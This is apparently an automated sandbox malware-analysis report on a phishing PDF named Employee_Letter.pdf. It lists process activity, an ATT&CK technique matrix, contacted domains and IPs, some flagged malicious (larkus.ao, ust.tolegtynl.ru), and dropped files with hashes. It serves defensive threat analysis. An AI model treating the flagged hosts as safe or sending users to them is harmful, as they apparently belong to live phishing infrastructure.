      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Employee_Letter.pdfInitial sample: PDF keyword /JS count = 0
      Source: Employee_Letter.pdfInitial sample: PDF keyword /JavaScript count = 0
      Source: Employee_Letter.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformation
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Process Discovery
      Remote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS Memory1
      System Information Discovery
      Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Extra Window Memory Injection
      1
      Extra Window Memory Injection
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        larkus.ao
        65.109.232.106
        truetrue
          unknown
          lotadmin.in
          92.249.45.121
          truefalse
            high
            dg4e0fvznfp7w5yucsbzdksjv3y888lrfbjbdblxtexjwvwzu64zjtf5v8.ezmbsgzm.ru
            104.21.32.251
            truefalse
              unknown
              s-part-0035.t-0009.t-msedge.net
              13.107.246.63
              truefalse
                high
                default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                217.20.58.99
                truefalse
                  high
                  d26p066pn2w0s0.cloudfront.net
                  13.227.8.47
                  truefalse
                    unknown
                    ipapi.co
                    104.26.8.44
                    truefalse
                      high
                      bg.microsoft.map.fastly.net
                      199.232.214.172
                      truefalse
                        high
                        code.jquery.com
                        151.101.130.137
                        truefalse
                          high
                          cdnjs.cloudflare.com
                          104.17.25.14
                          truefalse
                            high
                            challenges.cloudflare.com
                            104.18.95.41
                            truefalse
                              high
                              publisher.liveperson.net
                              34.120.154.120
                              truefalse
                                high
                                dh1y47vf5ttia.cloudfront.net
                                18.66.161.117
                                truefalse
                                  high
                                  www.google.com
                                  216.58.208.228
                                  truefalse
                                    high
                                    api.ipify.org
                                    104.26.12.205
                                    truefalse
                                      high
                                      go.eu.sparkpostmail1.com
                                      34.252.216.46
                                      truefalse
                                        high
                                        ust.tolegtynl.ru
                                        104.21.42.223
                                        truetrue
                                          unknown
                                          lpcdn.lpsnmedia.net
                                          unknown
                                          unknownfalse
                                            high
                                            js.monitor.azure.com
                                            unknown
                                            unknownfalse
                                              high
                                              s.go-mpulse.net
                                              unknown
                                              unknownfalse
                                                high
                                                va.v.liveperson.net
                                                unknown
                                                unknownfalse
                                                  high
                                                  www.larkus.ao
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    static-assets.fs.liveperson.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      cdn.botframework.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        logo.clearbit.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          x1.i.lencr.org
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            accdn.lpsnmedia.net
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              assets.adobedtm.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                www.azure.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  play.vidyard.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    c.go-mpulse.net
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      lptag.liveperson.net
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        2.19.198.227
                                                                        unknownEuropean Union
                                                                        16625AKAMAI-ASUSfalse
                                                                        23.195.76.153
                                                                        unknownUnited States
                                                                        2914NTT-COMMUNICATIONS-2914USfalse
                                                                        51.11.192.49
                                                                        unknownUnited Kingdom
                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        151.101.130.137
                                                                        code.jquery.comUnited States
                                                                        54113FASTLYUSfalse
                                                                        65.109.232.106
                                                                        larkus.aoUnited States
                                                                        11022ALABANZA-BALTUStrue
                                                                        172.67.139.11
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        34.120.154.120
                                                                        publisher.liveperson.netUnited States
                                                                        15169GOOGLEUSfalse
                                                                        23.195.38.175
                                                                        unknownUnited States
                                                                        20940AKAMAI-ASN1EUfalse
                                                                        35.190.80.1
                                                                        a.nel.cloudflare.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        18.66.161.113
                                                                        unknownUnited States
                                                                        3MIT-GATEWAYSUSfalse
                                                                        104.26.12.205
                                                                        api.ipify.orgUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        1.1.1.1
                                                                        unknownAustralia
                                                                        13335CLOUDFLARENETUSfalse
                                                                        18.66.161.117
                                                                        dh1y47vf5ttia.cloudfront.netUnited States
                                                                        3MIT-GATEWAYSUSfalse
                                                                        172.217.17.35
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.21.32.251
                                                                        dg4e0fvznfp7w5yucsbzdksjv3y888lrfbjbdblxtexjwvwzu64zjtf5v8.ezmbsgzm.ruUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.21.42.223
                                                                        ust.tolegtynl.ruUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        104.18.95.41
                                                                        challenges.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        184.30.25.170
                                                                        unknownUnited States
                                                                        16625AKAMAI-ASUSfalse
                                                                        20.231.239.246
                                                                        unknownUnited States
                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        239.255.255.250
                                                                        unknownReserved
                                                                        unknownunknownfalse
                                                                        13.227.8.65
                                                                        unknownUnited States
                                                                        16509AMAZON-02USfalse
                                                                        92.249.45.121
                                                                        lotadmin.inGermany
                                                                        47583AS-HOSTINGERLTfalse
                                                                        104.17.25.14
                                                                        cdnjs.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        104.26.8.44
                                                                        ipapi.coUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        13.107.246.63
                                                                        s-part-0035.t-0009.t-msedge.netUnited States
                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                        152.199.19.160
                                                                        unknownUnited States
                                                                        15133EDGECASTUSfalse
                                                                        217.20.58.99
                                                                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comDenmark
                                                                        15516DK-DANSKKABELTVDKfalse
                                                                        172.217.17.46
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.18.94.41
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        184.28.89.29
                                                                        unknownUnited States
                                                                        16625AKAMAI-ASUSfalse
                                                                        2.19.198.240
                                                                        unknownEuropean Union
                                                                        16625AKAMAI-ASUSfalse
                                                                        208.89.12.87
                                                                        unknownUnited States
                                                                        11054LIVEPERSONUSfalse
                                                                        178.249.97.99
                                                                        unknownUnited Kingdom
                                                                        11054LIVEPERSONUSfalse
                                                                        216.58.208.228
                                                                        www.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        23.218.208.137
                                                                        unknownUnited States
                                                                        6453AS6453USfalse
                                                                        34.237.241.83
                                                                        unknownUnited States
                                                                        14618AMAZON-AESUSfalse
                                                                        172.217.21.35
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        172.64.41.3
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        172.217.19.238
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        34.252.216.46
                                                                        go.eu.sparkpostmail1.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        184.30.26.43
                                                                        unknownUnited States
                                                                        16625AKAMAI-ASUSfalse
                                                                        178.249.97.23
                                                                        unknownUnited Kingdom
                                                                        11054LIVEPERSONUSfalse
                                                                        151.101.1.181
                                                                        unknownUnited States
                                                                        54113FASTLYUSfalse
                                                                        151.101.2.137
                                                                        unknownUnited States
                                                                        54113FASTLYUSfalse
                                                                        142.250.181.106
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        151.101.129.181
                                                                        unknownUnited States
                                                                        54113FASTLYUSfalse
                                                                        23.195.39.65
                                                                        unknownUnited States
                                                                        20940AKAMAI-ASN1EUfalse
                                                                        173.194.222.84
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        13.227.8.47
                                                                        d26p066pn2w0s0.cloudfront.netUnited States
                                                                        16509AMAZON-02USfalse
                                                                        IP
                                                                        192.168.2.16
                                                                        192.168.2.18
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1573285
                                                                        Start date and time:2024-12-11 19:11:32 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:18
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • EGA enabled
                                                                        Analysis Mode:stream
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Employee_Letter.pdf
                                                                        Detection:MAL
                                                                        Classification:mal64.phis.winPDF@40/204@99/303
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .pdf
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 173.194.222.84, 23.218.208.137, 172.217.17.46, 34.237.241.83, 18.213.11.84, 50.16.47.176, 54.224.241.105, 172.64.41.3, 162.159.61.3, 20.3.187.198, 23.195.39.65
                                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, glb.cws.prod.dcat.dsp.trafficmanager.net, clients.l.google.com, geo2.adobe.com, crl.root-x1.letsencrypt.org.edgekey.net
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • VT rate limit hit for: Employee_Letter.pdf
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):290
                                                                        Entropy (8bit):5.123327302359665
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:13F73C41C1B64C2236EB732F47BB4FCB
                                                                        SHA1:E49E7670FE649DDA78F58D26CBE687C4C8A40461
                                                                        SHA-256:B816F4BE480CD8D17749B907CDEB9870B31AFCD57A79D59064100F9CD77BA3B6
                                                                        SHA-512:79E656B5DE82808C95EAD253114E45AE891FD59A42B07865C7F22C2A2BD8ADCFFF6AA7E35B311327797E6DCED7C2D22FB41EC8ECCB04F316CE119969F0ABFD9E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:2024/12/11-13:12:06.143 1bb0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/11-13:12:06.145 1bb0 Recovering log #3.2024/12/11-13:12:06.145 1bb0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):334
                                                                        Entropy (8bit):5.181463571625253
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A39A648FCAEC05B7FE5166DA328D1C3D
                                                                        SHA1:310105B92D22A4714A67DFA9403FF4869D0F4688
                                                                        SHA-256:B34597F97A243D777C671D43C81D908168403D3C0035BA9C81D0F22D34D06115
                                                                        SHA-512:99C1D4BA5BD95B96C794BF71E69594C845294B34EBEBCE3F04D5C64ED722D347178B4D616955D9031FBE6984DAB0FA4ACC727DA58808279246625D249414B892
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:2024/12/11-13:12:05.782 1928 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/11-13:12:05.787 1928 Recovering log #3.2024/12/11-13:12:05.788 1928 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):403
                                                                        Entropy (8bit):4.99670747027479
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A4FD576467873AE8028F8686CE66494F
                                                                        SHA1:D11AAC868FADCFAC6714DA489ADD59086D4C028C
                                                                        SHA-256:4DF984D40CA489F5635FFD1D1E5C80F88C2BF1694CE6CC95A78DB89E94A7B869
                                                                        SHA-512:4EF6DAF66966D6E4970D2C7F83C0A7F6251315A5C75BF3C06A9C2D4986C704DC78AE4A07D7A53195AE032705B3F3399769084ECAE9908AADA636D9EF6674AC02
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378500737648425","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":730409},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):0
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A4FD576467873AE8028F8686CE66494F
                                                                        SHA1:D11AAC868FADCFAC6714DA489ADD59086D4C028C
                                                                        SHA-256:4DF984D40CA489F5635FFD1D1E5C80F88C2BF1694CE6CC95A78DB89E94A7B869
                                                                        SHA-512:4EF6DAF66966D6E4970D2C7F83C0A7F6251315A5C75BF3C06A9C2D4986C704DC78AE4A07D7A53195AE032705B3F3399769084ECAE9908AADA636D9EF6674AC02
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378500737648425","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":730409},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4099
                                                                        Entropy (8bit):5.2394036370327015
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:02BA4D5FF9F009ACFD7AD551EC73962D
                                                                        SHA1:FEAF14FE3B1CE00AA4EA55CB09916D19EDC1E153
                                                                        SHA-256:C13AE05727827783B788A1F6B8922CF8319FF7A9C36F333635363E1F71A0CCE5
                                                                        SHA-512:5B24E2DDE4DF96B21F675D4524F15F14DD3BB848B93A476D3E9617E80914B7067CB8CBD234955C04AC8E3E6D0B520FB4BCAD6435CD0A34CB8A29281746F38450
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):322
                                                                        Entropy (8bit):5.158754985207838
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:87A332455505E4BFD78EACF9CAC2748B
                                                                        SHA1:4EABB2DCA3820C42D43438475E6C4657A66A0BFF
                                                                        SHA-256:C13E5D4401FA885767BFA9194840D69605CBF313049FA9A960D0CB3C0092DFAD
                                                                        SHA-512:B7B5353A8B257E54A8F764814F5139F61931F71B9AE40B3C9779332B8C75B0F4E6A192C3E00D026F313DA28B730698BB1FAFBE9B78AC7C8AEE82060743DA4384
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:2024/12/11-13:12:06.184 1928 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/11-13:12:06.186 1928 Recovering log #3.2024/12/11-13:12:06.190 1928 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                        Category:dropped
                                                                        Size (bytes):65110
                                                                        Entropy (8bit):1.0456428312855794
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BBFD6F56187A920850F189245D77867D
                                                                        SHA1:05B9484D9CC291D52846F2A3930A9F494434C643
                                                                        SHA-256:1C7D85D2308B0BAA200C3C756AA176DBACAC51C27C96BE0AC0FADDD69CD1D7FC
                                                                        SHA-512:755B424A1C67863AFB5564283CCAAA0168A2AA624113AC5DF51D23C98E88155782FBF9B43EF211F22071F40D7BAB1B2B7E14F88CFB589738DC5026EC5F73638F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):57344
                                                                        Entropy (8bit):3.291927920232006
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                                        SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                                        SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                                        SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite Rollback Journal
                                                                        Category:dropped
                                                                        Size (bytes):16928
                                                                        Entropy (8bit):1.213510803531114
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FD6DA9273D0041318AEAA81F73FBC1F1
                                                                        SHA1:07EF2C843C2AAFFEF6E5528DD03617D1606F8821
                                                                        SHA-256:6286834E26712D688761F5C030B5477A3DADD99A350C2A90C99304015CAC26BC
                                                                        SHA-512:6D0CBC5C8F0DDC24BECB9828543093E0686B1BF8A3AEFE4B11AFDC90D4591D1617B0B7E0C1F27F2EF17723F4CEF1273448C1A4EC749E3F48516CEFDD2F4FD88D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.... .c.....kn..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:Certificate, Version=3
                                                                        Category:dropped
                                                                        Size (bytes):1391
                                                                        Entropy (8bit):7.705940075877404
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):71954
                                                                        Entropy (8bit):7.996617769952133
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
